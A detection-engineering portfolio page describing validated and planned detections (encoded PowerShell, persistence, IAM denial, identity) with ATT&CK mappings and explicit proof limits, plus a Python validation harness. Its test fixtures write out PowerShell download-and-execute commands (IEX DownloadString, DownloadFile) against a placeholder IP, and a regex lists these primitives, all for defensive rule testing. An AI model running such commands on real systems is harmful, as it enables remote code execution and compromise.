Detections

Detection engineering portfolio with proof boundaries attached.

This page shows the public detection-engineering surface: detection IDs, validation status, ATT&CK mapping where represented, proof ceilings, and runtime/public signal boundaries.

DETECTION_ENGINEERING · CONTROLLED_VALIDATION · RUNTIME_PUBLIC_CLAIMS_BOUNDED

Public inspection layer

source truth: separate
runtime truth: separate
signal truth: separate
evidence truth: separate
public proof: separate

Portfolio

Detection cards

Each card keeps validation, proof ceiling, and runtime/signal boundary visible so detection work cannot be over-promoted.

Endpoint / PowerShell

HO-DET-001 · VALIDATED

Suspicious PowerShell EncodedCommand Execution

T1059.001 · Command and Scripting Interpreter: PowerShell

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Runtime and signal claims are blocked at this ceiling. No production, customer-deployment, or autonomous-resolution claim is made.

Endpoint / Persistence

HO-DET-011 · PRIVATE

Windows Service Creation / Binary Change

Persistence: service creation — ATT&CK mapping in source artifact

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Runtime evidence for this detection is held privately and is excluded from public proof; no public-safe runtime claim is made, and runtime and signal claims remain blocked.

Endpoint / Persistence

HO-DET-012 · VALIDATED

Suspicious Scheduled Task Creation

Scheduled Task/Job: Scheduled Task — ATT&CK mapping in source artifact

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Proof record present in hawkinsoperations-proof. Runtime, signal, public-safe runtime proof, and completeness claims remain blocked at this ceiling.

Cloud / IAM

AWS-DET-001 · FIXTURE

CloudTrail-Style IAM Denial

Cloud / IAM denial — mapping in source/proof artifacts

Validation
Controlled validation passed
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Fixture-only. Live AWS and CloudTrail proof are blocked at this ceiling; no live-cloud claim is made.

Identity / Access Behavior

ID-DET-001…004 · VALIDATED

Identity Detection Family

ATT&CK-aligned identity behavior (mapping per detection)

Validation
ID-DET-001…004, each: 10 controlled cases (5 positive, 5 negative); 0 missed detections on the positives, 0 false positives on the negatives
Proof ceiling
CONTROLLED_TEST_VALIDATED
Runtime / signal boundary
Live IdP, production identity coverage, and completeness claims are blocked at this ceiling; no live-identity claim is made.
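The validation format the cards above report (a fixed set of labelled positive and negative cases, misses and false positives counted separately, and the CONTROLLED_TEST_VALIDATED ceiling granted only on a clean run) can be made concrete with a small fixture-driven harness. What follows is an added example written for this page, not the portfolio's own code: the two rule bodies are illustrative stand-ins for the HO-DET-001 PowerShell EncodedCommand detection and the AWS-DET-001 CloudTrail-style IAM denial detection, the IDs EX-DET-PS and EX-DET-IAM are hypothetical, the event field names (image, command_line, eventSource, errorCode) are assumed, and every fixture event is constructed inline rather than taken from real telemetry.

```python
# Controlled-validation harness: an added example, not the portfolio's own code.
# Assumptions (not from the page): events are dicts shaped like a Windows process-creation
# record or a CloudTrail record; the two rule bodies are illustrative stand-ins for
# HO-DET-001 and AWS-DET-001; all fixture events below are constructed, not real telemetry.
import base64
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, object]

# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Download / in-memory execution primitives looked for in the decoded script.
SUSPICIOUS = re.compile(r"(?i)downloadstring|downloadfile|invoke-expression|\biex\b|invoke-webrequest"
                        r"|\biwr\b|frombase64string|net\.webclient|bypass")

def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def detect_encoded_powershell(event: Event) -> bool:
    """Illustrative T1059.001 rule: PowerShell launched with an encoded command whose decoded text
    carries download/execution primitives. Encoding alone is not enough; admin tooling uses it too."""
    if not str(event.get("image", "")).lower().endswith(("powershell.exe", "pwsh.exe")):
        return False
    m = ENC_FLAG.search(str(event.get("command_line", "")))
    decoded = decode_encoded_command(m.group(1)) if m else None
    return bool(decoded and SUSPICIOUS.search(decoded))

def detect_iam_denial(event: Event) -> bool:
    """Illustrative CloudTrail-style rule: an IAM API call the service refused."""
    return (event.get("eventSource") == "iam.amazonaws.com"
            and str(event.get("errorCode", "")).startswith("AccessDenied"))

@dataclass
class ValidationResult:
    detection_id: str
    cases: int
    positives: int
    negatives: int
    missed: int            # labelled positive, rule stayed silent (false negative)
    false_positives: int   # labelled negative, rule fired

    @property
    def ceiling(self) -> str:
        """The ceiling is earned only by a clean run; one miss or one false positive denies it."""
        return "CONTROLLED_TEST_VALIDATED" if self.missed == 0 and self.false_positives == 0 else "VALIDATION_FAILED"

def validate(detection_id: str, rule: Callable[[Event], bool],
             cases: List[Tuple[Event, bool]]) -> ValidationResult:
    """Run one rule over labelled fixtures, counting misses and false positives separately."""
    pos = neg = missed = fp = 0
    for event, expected in cases:
        fired = rule(event)
        if expected:
            pos, missed = pos + 1, missed + (not fired)
        else:
            neg, fp = neg + 1, fp + fired
    return ValidationResult(detection_id, len(cases), pos, neg, missed, fp)

def _enc(script: str) -> str:
    """base64(UTF-16LE), the form PowerShell expects; used only to build fixtures."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def _ps(cmd: str, image: str = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") -> Event:
    return {"image": image, "command_line": cmd}

# Constructed fixtures: 5 positive and 5 negative, the page's 10-case shape.
POWERSHELL_CASES: List[Tuple[Event, bool]] = [
    (_ps("powershell.exe -nop -w hidden -enc " + _enc("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")), True),
    (_ps("powershell.exe -EncodedCommand " + _enc("(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/x.exe','C:\\Temp\\x.exe')")), True),
    (_ps("powershell.exe -ep bypass -ec " + _enc("Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGk=')))")), True),
    (_ps("pwsh.exe -e " + _enc("iex (iwr http://192.0.2.10/p)"), image=r"C:\Program Files\PowerShell\7\pwsh.exe"), True),
    (_ps("POWERSHELL.EXE -NoProfile -ENC " + _enc("Set-ExecutionPolicy Bypass -Scope Process; . .\\run.ps1")), True),
    (_ps("powershell.exe -enc " + _enc("Get-Process | Select-Object Name, Id")), False),   # benign encoded admin command
    (_ps("powershell.exe -Command Get-Date"), False),                                       # no encoded command at all
    (_ps("powershell.exe -enc not_base64_at_all!!"), False),                               # flag present, blob not base64
    (_ps("cmd.exe /c echo -enc " + _enc("iex 1"), image=r"C:\Windows\System32\cmd.exe"), False),  # not PowerShell
    (_ps("powershell.exe -File C:\\scripts\\backup.ps1 -enc"), False),                     # '-enc' with no payload
]
# Constructed CloudTrail-style fixtures.
CLOUDTRAIL_CASES: List[Tuple[Event, bool]] = [
    ({"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "errorCode": "AccessDenied"}, True),
    ({"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy", "errorCode": "AccessDenied"}, True),
    ({"eventSource": "iam.amazonaws.com", "eventName": "ListUsers"}, False),                             # allowed call
    ({"eventSource": "s3.amazonaws.com", "eventName": "GetObject", "errorCode": "AccessDenied"}, False),  # not IAM
]

def run_portfolio() -> Dict[str, ValidationResult]:
    """Hypothetical IDs EX-DET-PS / EX-DET-IAM stand in for HO-DET-001 / AWS-DET-001."""
    return {d.detection_id: d for d in (
        validate("EX-DET-PS", detect_encoded_powershell, POWERSHELL_CASES),
        validate("EX-DET-IAM", detect_iam_denial, CLOUDTRAIL_CASES))}

if __name__ == "__main__":
    for r in run_portfolio().values():
        print(f"{r.detection_id}: {r.cases} cases ({r.positives} positive, {r.negatives} negative), "
              f"{r.missed} missed, {r.false_positives} false positives -> {r.ceiling}")
```

Running the script prints one line per rule with the case split, the miss and false-positive counts, and the resulting ceiling. Decoding the argument rather than matching on the flag alone is what keeps the benign encoded administrative command in the negative set from firing. The harness makes the same point the cards make: a pass says only that the rule behaves correctly on these constructed events, and says nothing about live runtime or signal coverage.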

Telemetry / Defense Evasion

HO-DET-013 · PLANNED

Defense Tool and Telemetry Tamper Attempt

Defense evasion / telemetry tamper — mapping in source artifact

Validation
Validation not complete.
Proof ceiling
SOURCE_EXISTS · VALIDATION_PLANNED
Runtime / signal boundary
Source exists only. Validation, runtime, and signal claims are blocked at this ceiling; no validation claim is made yet.

Network / Visibility Contract

HO-NDR-001 · CONTRACT

Security Onion / NDR Visibility Boundary

Boundary / corroboration contract — not a coverage claim

Validation
Contract surface — no validation count.
Proof ceiling
BOUNDARY_CONTRACT_ONLY
Runtime / signal boundary
Security Onion observed proof is blocked; this defines a visibility boundary and makes no observed-signal claim.

Pipeline / Telemetry Contract

HO-PIPE-001 · PLANNED

Cribl / Pipeline Route Integrity

Pipeline route contract — not an ATT&CK detection proof

Validation
Source exists; validation planned.
Proof ceiling
SOURCE_EXISTS · VALIDATION_PLANNED
Runtime / signal boundary
Cribl-routed proof is blocked at this ceiling; no Cribl-routed claim is made.

Mapping

ATT&CK and lifecycle map

Cyber Kill Chain and ATT&CK mapping help reviewers understand lifecycle stage, detection intent, and coverage. They do not prove live telemetry, runtime deployment, signal observation, or customer use.

Reconnaissance

Boundary/source contracts plus controlled identity validation reports.

Use this stage to inspect visibility planning, identity-context validation, and gap tracking without inferring live coverage.

Strongest reviewer artifact: ID-DET validation reports and HO-NDR-001 / HO-PIPE-001 boundary contracts.

Weaponization

Defensive behavior modeling with source, validation, and proof truth separated.

Use this stage to see how behaviors become testable detection artifacts and where proof records do or do not exist.

Strongest reviewer artifact: Proof records for HO-DET-001, HO-DET-011, HO-DET-012, and AWS-DET-001 where present.

Delivery

FIXTURE_ONLY / CONTROLLED_TEST_VALIDATED.

Use this stage for cloud-access fixture review only; it does not assert a live AWS deployment.

Strongest reviewer artifact: AWS-DET-001 proof record and proof card.

Exploitation

CONTROLLED_TEST_VALIDATED.

Use this stage to trace PowerShell execution detection from ATT&CK mapping through source, validation, and proof boundary.

Strongest reviewer artifact: HO-DET-001 proof record, proof card, Proof Pack 001, and validation report.